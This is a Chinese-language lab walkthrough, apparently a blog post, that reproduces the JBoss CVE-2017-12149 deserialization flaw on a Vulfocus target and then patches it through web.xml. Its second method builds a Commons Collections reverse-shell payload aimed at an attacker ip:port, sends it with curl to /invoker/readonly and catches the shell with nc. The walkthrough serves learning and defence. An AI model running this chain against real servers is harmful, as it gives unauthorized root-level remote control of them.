CVE-2017-12149 复现及修复
CVE-2017-12149 复现及修复
漏洞名称:JBOOS AS 6.X 反序列化漏洞
CVE编号:CVE-2017-12149
漏洞等级:高危
影响版本:5.x和6.x版本
漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。
一.实验环境
| 软件 | 版本 |
|---|---|
| JBoss | V6.0Final |
| jboss-_CVE-2017-12149 | (工具) |
二.实验环境
实验平台提供漏洞: VULFOCUS
攻击机:centos服务器
三.实验步骤
打开网址
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9rpIJnqT-1627107431913)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724102800723.png)]](https://img-blog.csdnimg.cn/dd9bf5478cff4bbaa071b4c836a1e495.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjU4MDYxNA==,size_16,color_FFFFFF,t_70)
我先是用御剑去扫了一下目录 发现这个目录 打开是500 所以一遍情况下存在漏洞
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ARFDuGuu-1627107431915)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724102727812.png)]](https://img-blog.csdnimg.cn/82dc213ac8ef4249894faab6e6d97fb9.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjU4MDYxNA==,size_16,color_FFFFFF,t_70)
方法一 工具 jboss-_CVE-2017-12149
使用工具 jboss-_CVE-2017-12149
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JqKh12wG-1627107431916)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724103135506.png)]](https://img-blog.csdnimg.cn/620b1fc7bcb34bbd86566d610c16569e.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjU4MDYxNA==,size_16,color_FFFFFF,t_70)
可以发现是root权限 所以 直接输入命令
find -name flag* 查询flag
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AljQCq4S-1627107431917)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724103614462.png)]](https://img-blog.csdnimg.cn/85932c655cfb4a719fc6c4cad250083d.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjU4MDYxNA==,size_16,color_FFFFFF,t_70)
方法二 反弹shell
首先去了解一下什么是 反弹shell
然后操作实验
操作:centos服务器
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port
//反弹shell的IP和端口
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JmuG3HFn-1627107431918)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724101214866.png)]](https://img-blog.csdnimg.cn/cc1fee6a8fc44162a8ba13d4b9bdedf7.png)
curl 漏洞ip/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RKZRJ4ZM-1627107431920)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724101323717.png)]](https://img-blog.csdnimg.cn/fa6efe2cd4d54cdc9ef647fed3e41a3a.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjU4MDYxNA==,size_16,color_FFFFFF,t_70)
监听
nc -vlp 端口
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yfxc6NGn-1627107431920)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724101410837.png)]](https://img-blog.csdnimg.cn/12fc492685c14444907d669d1d79fd48.png)
获得shell 直接执行ls 查看目录
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7S4gzEvO-1627107431921)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724101502531.png)]](https://img-blog.csdnimg.cn/e2f64bc40c1241b387a8d80a0c2ed7fe.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjU4MDYxNA==,size_16,color_FFFFFF,t_70)
ls /tmp 找到flag
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7b8x5zGY-1627107431922)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724101540579.png)]](https://img-blog.csdnimg.cn/670069e4a6f346878c76877e02cac15f.png)
修复漏洞
首先进入/jboss/server/default/deploy/http-invoker.sar/invoker.war/WEB-INF/web.xml 目录
cd 靶机的根目录/jboss/server/default/deploy/http-invoker.sar/invoker.war/WEB-INF/web.xml
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-elzGnC4L-1627107431922)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724141130723.png)]](https://img-blog.csdnimg.cn/6b53a6a751e340618a2c75f42e82aa03.png)
进行修改
<url-pattern>*</url-pattern> 在安全约束里添加修改
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FREXMCnP-1627107431923)(C:\Users\范振豪\AppData\Roaming\Typora\typora-user-images\image-20210724140957302.png)]](https://img-blog.csdnimg.cn/3c4abade6ee341909e485faaca430339.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NjU4MDYxNA==,size_16,color_FFFFFF,t_70)
最后重启一下jboss服务 漏洞不再可以访问

浙公网安备 33010602011771号